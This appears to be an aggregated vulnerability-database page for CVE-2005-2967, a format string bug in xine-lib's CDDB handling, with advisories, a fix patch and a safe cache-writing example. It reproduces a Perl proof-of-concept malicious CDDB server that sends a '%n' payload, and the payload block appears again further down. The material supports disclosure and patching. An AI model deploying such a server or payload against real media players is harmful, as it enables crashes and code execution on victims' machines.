CVE-2005-2967
CVSS 7.5
Published: 2005-10-14 06:02:00
Revised: 2008-09-05 16:53:06

[Original] Format string vulnerability in input_cdda.c in xine-lib 1-beta through 1-beta 3, 1-rc, 1.0 through 1.0.2, and 1.1.1 allows remote servers to execute arbitrary code via format string specifiers in metadata in CDDB server responses when the victim plays a CD.


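[CNNVD] Xine-Lib CDDB Information Remote Format String Vulnerability (CNNVD-200510-099)

        xine is a free media player that supports many formats.
        When xine or gxine is used to play a CD, the program connects to a CDDB server to retrieve the recorded artist, band, song titles and so on, and then writes this information to a cache file. The code in xine-lib that performs this operation has a format string vulnerability that may allow remote execution of arbitrary code.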

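- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]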

- CPE (affected platforms and products)

cpe:/a:xine:xine-lib:1.0.1
cpe:/a:xine:xine-lib:0.9.13
cpe:/a:xine:xine-lib:1.0.2
cpe:/a:xine:xine-lib:1.1.0
cpe:/a:xine:xine-lib:1.0

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2967
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2967
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-099
(Official data source) CNNVD

- Other links and resources

http://xinehq.de/index.php/security/XSA-2005-1
(VENDOR_ADVISORY)  CONFIRM  http://xinehq.de/index.php/security/XSA-2005-1
http://www.securityfocus.com/bid/15044
(PATCH)  BID  15044
http://www.debian.org/security/2005/dsa-863
(VENDOR_ADVISORY)  DEBIAN  DSA-863
http://secunia.com/advisories/17099/
(VENDOR_ADVISORY)  SECUNIA  17099
http://xforce.iss.net/xforce/xfdb/22545
(UNKNOWN)  XF  xinelib-inputcdda-format-string(22545)
http://www.gentoo.org/security/en/glsa/glsa-200510-08.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200510-08
http://www.ubuntu.com/usn/usn-196-1
(UNKNOWN)  UBUNTU  USN-196-1
http://www.osvdb.org/19892
(UNKNOWN)  OSVDB  19892
http://www.novell.com/linux/security/advisories/2005_24_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2005:024
http://www.mandriva.com/security/advisories?name=MDKSA-2005:180
(UNKNOWN)  MANDRIVA  MDKSA-2005:180
http://slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.415454
(UNKNOWN)  SLACKWARE  SSA:2005-283-01
http://secunia.com/advisories/17282
(UNKNOWN)  SECUNIA  17282
http://secunia.com/advisories/17179
(UNKNOWN)  SECUNIA  17179
http://secunia.com/advisories/17162
(UNKNOWN)  SECUNIA  17162
http://secunia.com/advisories/17132
(UNKNOWN)  SECUNIA  17132
http://secunia.com/advisories/17111
(UNKNOWN)  SECUNIA  17111
http://secunia.com/advisories/17097
(UNKNOWN)  SECUNIA  17097
http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0196.html
(UNKNOWN)  FULLDISC  20051008 xine/gxine CD Player Remote Format String Bug

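- Vulnerability information

Xine-Lib CDDB Information Remote Format String Vulnerability
High risk  Format string
2005-10-14 00:00:00 2005-10-20 00:00:00
Remote
        xine is a free media player that supports many formats.
        When xine or gxine is used to play a CD, the program connects to a CDDB server to retrieve the recorded artist, band, song titles and so on, and then writes this information to a cache file. The code in xine-lib that performs this operation has a format string vulnerability that may allow remote execution of arbitrary code.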

- Announcements and patches

        The vendor has released an upgrade patch to fix this security issue. The patch is available at:
        http://security.gentoo.org/glsa/glsa-200510-08.xml

- Vulnerability information (1242)

xine-lib <= 1.1 (media player library) Remote Format String Exploit (EDBID:1242)
linux remote
2005-10-10 Verified
0 Ulf Harnhammar
N/A
#!/usr/bin/perl --
# When playing an Audio CD, using xine-lib based media application, 
# the library contacts a CDDB server to retrieve metadata like the 
# title and artist's name. During processing of this data, a response 
# from the server, which is located in memory on the stack, is passed 
# to the fprintf() function as a format string.
# An attacker can set up a malicious CDDB server and trick the client 
# into using this server instead of the pre-configured one. Alternatively, 
# any user and therefore the attacker can modify entries in the official 
# CDDB server. Using this format string vulnerability, attacker-chosen 
# data can be written to an attacker-chosen memory location. This allows 
# the attacker to alter the control flow and to execute malicious code with 
# the permissions of the user running the application.
# Although it requires the user to play an Audio CD, this vulnerability can 
# still be exploited remotely, because a xine Audio CD MRL 
# (media resource locator) could be embedded into a website. Added for future ref. /str0ke

# xine-cddb-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

use strict;
use IO::Socket;

$main::port = 8880;
$main::timeout = 5;


# *** SUBROUTINES ***


sub mysend($$)
{
  my $file = shift;
  my $str = shift;

  print $file "$str\n";
  print "SENT:  $str\n";
} # sub mysend


sub myreceive($)
{
  my $file = shift;
  my $inp;

  eval
  {
    local $SIG{ALRM} = sub { die "alarm\n" };
    alarm $main::timeout;
    $inp = <$file>;
    alarm 0;
  };

  if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
  $inp =~ tr/\015\012\000//d;
  print "RECEIVED:  $inp\n";
  $inp;
} # sub myreceive


# *** MAIN PROGRAM ***


{
  my $server = IO::Socket::INET->new( Proto     => 'tcp',
                                      LocalPort => $main::port,
                                      Listen    => SOMAXCONN,
                                      Reuse     => 1);
  die "can't set up server!\n" unless $server;


  while (my $client = $server->accept())
  {
    $client->autoflush(1);
    print 'connection from '.$client->peerhost."\n";


    mysend($client, '201 metaur CDDBP server v1.5PL2 ready at '.
           scalar localtime);

    while (my $str = myreceive($client))
    {
      if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i)
      {
        mysend($client, "200 Hello and welcome $1\@$2 running $3.");
        next;
      }

      if ($str =~ m/^proto (\d+)$/i)
      {
        mysend($client, "201 OK, CDDB protocol level now: $1");
        next;
      }

      if ($str =~ m/^cddb query ([0-9a-f]+)/i)
      {
        mysend($client, "200 rock $1 Exploiters / Formatted and Stringed");
        next;
      }

      if ($str =~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i)
      {
        my $docum = <<HERE;
210 $1 $2 CD database entry follows (until terminating \`.')
# %n%n%n%n
DISCID=$2
DTITLE=Exploiters / Formatted and Stringed
DYEAR=2005
DGENRE=Rock
TTITLE0=Format
TTITLE1=String
TTITLE2=Bug
EXTD= YEAR: 2005
EXTT0=
EXTT1=
EXTT2=
PLAYORDER=
.
HERE

        $docum =~ s|\s+$||s;
        mysend($client, $docum);
        next;
      }

      if ($str =~ m/^quit$/i)
      {
        mysend($client, '230 metaur Closing connection.  Goodbye.');
        last;
      }

      mysend($client, '500 Unrecognized command.');
    } # while str=myreceive(client)

    close $client;
    print "closed\n\n\n";
  } # while client=server->accept()
}

# milw0rm.com [2005-10-10]
		

- Vulnerability information (F40639)

Debian Linux Security Advisory 863-1 (PacketStormID:F40639)
2005-10-12 00:00:00
Debian  security.debian.org
advisory,arbitrary
linux,debian
CVE-2005-2967

Debian Security Advisory DSA 863-1 - Ulf H

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 863-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
October 12th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : xine-lib
Vulnerability  : format string vulnerability
Problem type   : remote
Debian-specific: no
CVE ID         : CAN-2005-2967
Debian Bug     : 332919

Ulf H    

- Vulnerability information (F40526)

Gentoo Linux Security Advisory 200510-8 (PacketStormID:F40526)
2005-10-08 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2005-2967

Gentoo Linux Security Advisory GLSA 200510-08 - Ulf Harnhammar discovered a format string bug in the routines handling CDDB server response contents. Versions less than 1.1.0-r5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200510-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: xine-lib: Format string vulnerability
      Date: October 08, 2005
      Bugs: #107854
        ID: 200510-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

xine-lib contains a format string error in CDDB response handling that
may be exploited to execute arbitrary code.

Background
==========

xine-lib is a multimedia library which can be utilized to create
multimedia frontends. It includes functions to retrieve information
about audio CD contents from public CDDB servers.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  media-libs/xine-lib     < 1.1.0-r5                    >= 1.1.0-r5
                                                          *>= 1.0.1-r4
                                                          *>= 1_rc8-r2

Description
===========

Ulf Harnhammar discovered a format string bug in the routines handling
CDDB server response contents.

Impact
======

An attacker could submit malicious information about an audio CD to a
public CDDB server (or impersonate a public CDDB server). When the
victim plays this CD on a multimedia frontend relying on xine-lib, it
could end up executing arbitrary code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All xine-lib users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose media-libs/xine-lib

References
==========

  [ 1 ] CAN-2005-2967
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2967

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
    

- Vulnerability information (F40524)

xine-cddb-server.pl.txt (PacketStormID:F40524)
2005-10-08 00:00:00
Ulf Harnhammar  debian.org
exploit,remote,proof of concept
CVE-2005-2967

Proof of concept exploit for the remote format string vulnerability discovered in the xine/gxine CD player. The vulnerable code is found in the xine-lib library that both xine and gxine use. The vulnerable versions are at least xine-lib-0.9.13, 1.0, 1.0.1, 1.0.2 and 1.1.0. Patch available here.


- Vulnerability information (F40523)

xine-lib.formatstring.patch (PacketStormID:F40523)
2005-10-08 00:00:00
Ulf Harnhammar  debian.org
remote,patch
unix
CVE-2005-2967

Patch for the xine/gxine CD player that was found susceptible to a remote format string bug. The vulnerable code is found in the xine-lib library that both xine and gxine use. The vulnerable versions are at least xine-lib-0.9.13, 1.0, 1.0.1, 1.0.2 and 1.1.0.

--- src/input/input_cdda.c.old	2005-05-28 11:26:59.000000000 +0200
+++ src/input/input_cdda.c	2005-10-02 01:43:47.921856832 +0200
@@ -1473,7 +1473,7 @@ static void _cdda_save_cached_cddb_infos
     return;
   }
   else {
-    fprintf(fd, filecontent);
+    fprintf(fd, "%s", filecontent);
     fclose(fd);
   }
   
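Review bot: at the changed fprintf line, `fputs(filecontent, fd)` would do the same write with no format parsing at all, so no later edit can reintroduce a non-literal format here; `"%s"` is correct but still sends the text through the printf machinery. The return values of the write and of `fclose(fd)` in the trailing context are not checked, so a short or failed cache write goes unreported; checking both and logging the failure would be a useful follow-up. Since this is the cache-saving routine (`_cdda_save_cached_cddb_infos`), the other printf-family calls in input_cdda.c deserve the same look for non-literal format arguments.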
    

- Vulnerability information (F40522)

xineFormat.txt (PacketStormID:F40522)
2005-10-08 00:00:00
Ulf Harnhammar  debian.org
advisory,remote
CVE-2005-2967

The xine/gxine CD player is susceptible to a remote format string bug. The vulnerable code is found in the xine-lib library that both xine and gxine use. The vulnerable versions are at least xine-lib-0.9.13, 1.0, 1.0.1, 1.0.2 and 1.1.0. Patch available here.

xine/gxine CD Player Remote Format String Bug


BACKGROUND


"xine is a free multimedia player. It plays back CDs, DVDs, and
VCDs. It also decodes multimedia files like AVI, MOV, WMV, and MP3
from local disk drives, and displays multimedia streamed over the
Internet. It interprets many of the most common multimedia formats
available - and some of the most uncommon formats, too."

gxine is a "gtk-based media player style gui + mozilla plugin".

( from http://www.xinehq.de/ )

Both programs are available in many Linux distributions and *BSD
ports collections.


BUG


When you use xine or gxine to play a CD, the programs will connect to
a CDDB server to retrieve the record's artist/band and title as well
as the song titles. The programs write this information to a cache
file, and the code in xine-lib that performs this action suffers from
a format string bug, allowing remote execution of arbitrary code.

It is worth noting that CDDB servers allow any user to add or
modify information about records. It is also worth noting that the
vulnerable code in xine-lib writes all information about a record
that the server sends to it to the cache file, including comments.

Thus, this bug could be used for automated mass attacks against
anyone in the world who listens to a particular CD in xine or
gxine. There is also a potential for social engineering attacks.

The vulnerable code is found in the xine-lib library that both xine
and gxine use. The vulnerable versions are at least xine-lib-0.9.13,
1.0, 1.0.1, 1.0.2 and 1.1.0.

The bug has the identifier CAN-2005-2967.


WORKAROUND


To avoid this vulnerability, the user can switch off CDDB lookups
under Settings / Setup - change Configuration experience level to
Advanced, press Apply, go to the Media tab, deselect Query CDDB,
press Apply and finally OK.


TESTING AND PATCHING


I have attached a fake CDDB server that exhibits this problem. (You
do not need to change server to get hit by this bug, as the CDDB
servers allow anyone to add or modify information, but I think it
was nicer to test it this way.)

You run this server, then you start xine or gxine, change
Configuration experience level to Master of the known universe,
press Apply, go to the Media tab, enter the malicious CDDB server's
host name under CDDB server name, press Apply and then OK. Finally,
you put a CD in the computer's CD drive and press the CD button in
the programs. The format string bug will then crash xine or gxine.

Apart from the server, I have also attached a patch that corrects
the problem.

The upstream developers as well as the vendor-sec mailing list
were contacted, and the 8th of October was agreed upon as the
release date.


// Ulf Harnhammar for the Debian Security Audit Project
   http://www.debian.org/security/audit/
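
The cache-write step described in the advisory above, shown as an added example that is not xine-lib code and not part of the original advisory: the server text is written as data with fputs(), and a small scanner counts printf conversion specifiers so a client can log suspicious CDDB entries. Function names, the file path and the DISCID value are assumptions made for the example.

```c
/* Added example (not xine-lib code): store CDDB text as data and report
 * printf conversion specifiers found in it. All names are hypothetical. */
#include <stdio.h>
#include <string.h>

/* Constructed sample: the comment line is the one quoted on this page,
 * the DISCID value is a placeholder. */
static const char SAMPLE_ENTRY[] =
    "# %n%n%n%n\n"
    "DISCID=00000000\n"
    "DTITLE=Exploiters / Formatted and Stringed\n";

/* Count printf-style conversion specifiers in s; "%%" is a literal. */
int count_format_specifiers(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '\0') break;
        if (*p == '%') continue;
        /* Skip flags, width, precision and length modifiers. */
        while (*p && strchr("-+ #0123456789.*$hlqjzLt", *p))
            p++;
        if (*p == '\0') break;
        if (strchr("diouxXeEfFgGaAcspn", *p)) n++;
        else p--;  /* not a conversion: re-examine this character */
    }
    return n;
}

/* Write content to path as data. Returns 0 on success, -1 on failure. */
int save_cddb_cache(const char *path, const char *content)
{
    FILE *fd = fopen(path, "w");
    if (fd == NULL) return -1;
    int rc = (fputs(content, fd) == EOF) ? -1 : 0;  /* never a format */
    if (fclose(fd) != 0) rc = -1;
    return rc;
}

/* Return 1 if the file at path holds exactly content, else 0. */
int cache_matches(const char *path, const char *content)
{
    char buf[512];
    FILE *fd = fopen(path, "r");
    if (fd == NULL) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, fd);
    fclose(fd);
    buf[n] = '\0';
    return strcmp(buf, content) == 0;
}

int main(void)
{
    const char *path = "/tmp/xine_cddb_example.txt";
    int hits = count_format_specifiers(SAMPLE_ENTRY);
    if (hits > 0)
        fprintf(stderr, "cddb: %d conversion specifier(s) in server text\n", hits);
    if (save_cddb_cache(path, SAMPLE_ENTRY) != 0) return 1;
    printf("stored verbatim: %s\n", cache_matches(path, SAMPLE_ENTRY) ? "yes" : "no");
    remove(path);
    return 0;
}
```

GCC and Clang report the original call shape, a non-literal format string with no arguments, when built with -Wformat -Wformat-security.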

    

- Vulnerability information

19892
xine/gxine xine-lib CDDB Response Format String
Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

xine-lib contains a flaw that may allow remote execution of arbitrary code. The issue is triggered when a xine-lib based media application, such as xine or gxine, retrieves improper metadata from a malicious CDDB server while playing an audio CD. The metadata is placed in memory on the stack and eventually passed to a fprintf() function as a format string. This allows the malicious user to alter the control flow and to execute malicious code with the permissions of the user running the application.

- Timeline

2005-10-08 Unknown
2005-10-08 Unknown

- Solution

Upgrade to version 1.0.3 or higher, as it has been reported to fix this vulnerability. In addition, the creditee and the vendor released a patch for some older versions. It is also possible to correct the issue by implementing the following workaround: delete the file "xineplug_inp_cdda.so" from the xine-lib plugin directory. You will lose the ability to play audio CDs.

- Related references

- Vulnerability author

- Vulnerability information

Xine-Lib Remote CDDB Information Format String Vulnerability
Input Validation Error 15044
Yes No
2005-10-08 12:00:00 2009-07-12 05:07:00
Ulf Harnhammar from the Debian Security Audit Project discovered this vulnerability.

- Affected program versions

xine xine-lib 1.1
xine xine-lib 1.0.2
xine xine-lib 1.0.1
xine xine-lib 1.0
xine xine-lib 0.9.13
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
Slackware Linux 10.2
Slackware Linux 10.1
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux -current
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Conectiva Linux 10.0

- Vulnerability discussion

Xine-lib is susceptible to a remote format-string vulnerability. This issue is due to the application's failure to securely implement a formatted-printing function.

Successful exploitation of this vulnerability allows remote attackers to execute arbitrary machine code in the context of the affected application.

Xine-lib versions 0.9.13, 1.0, 1.0.1, 1.0.2, and 1.1.0 are reported to be affected. Other versions may also be affected, as well as all applications that use a vulnerable version of the library.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

A proof-of-concept exploit is available that causes a crash in affected applications. This is a fake CDDB server that returns the following data to clients:

# %n%n%n%n
DISCID=$2
DTITLE=Exploiters / Formatted and Stringed
DYEAR=2005
DGENRE=Rock
TTITLE0=Format
TTITLE1=String
TTITLE2=Bug
EXTD= YEAR: 2005
EXTT0=
EXTT1=
EXTT2=
PLAYORDER=

- Solution


Please see the referenced vendor advisories for further information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com


xine xine-lib 1.0

xine xine-lib 1.0.1

xine xine-lib 1.1

Conectiva Linux 10.0

- Related references

 

 
